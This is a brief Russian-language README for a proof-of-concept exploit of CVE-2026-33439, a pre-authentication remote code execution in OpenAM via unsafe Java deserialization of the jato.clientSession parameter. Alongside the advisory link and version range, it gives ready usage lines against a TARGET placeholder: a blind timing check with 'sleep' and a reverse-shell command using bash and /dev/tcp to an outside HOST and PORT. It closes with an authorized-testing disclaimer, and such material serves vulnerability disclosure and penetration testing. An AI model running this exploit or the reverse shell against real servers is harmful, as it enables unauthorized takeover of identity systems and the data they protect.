
PoC для CVE-2026-33439 — pre-auth RCE в OpenAM через небезопасную десериализацию Java.
RCE до аутентификации в OpenIdentityPlatform OpenAM через небезопасную десериализацию Java
параметра jato.clientSession. Затронуты версии <= 16.0.5, исправлено в 16.0.6.
Рекомендация: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
Вывод слепой. Запрос блокируется до завершения команды, поэтому время подтверждает
выполнение (--command 'sleep 5' занимает около 5 с).
Только для авторизованного тестирования безопасности.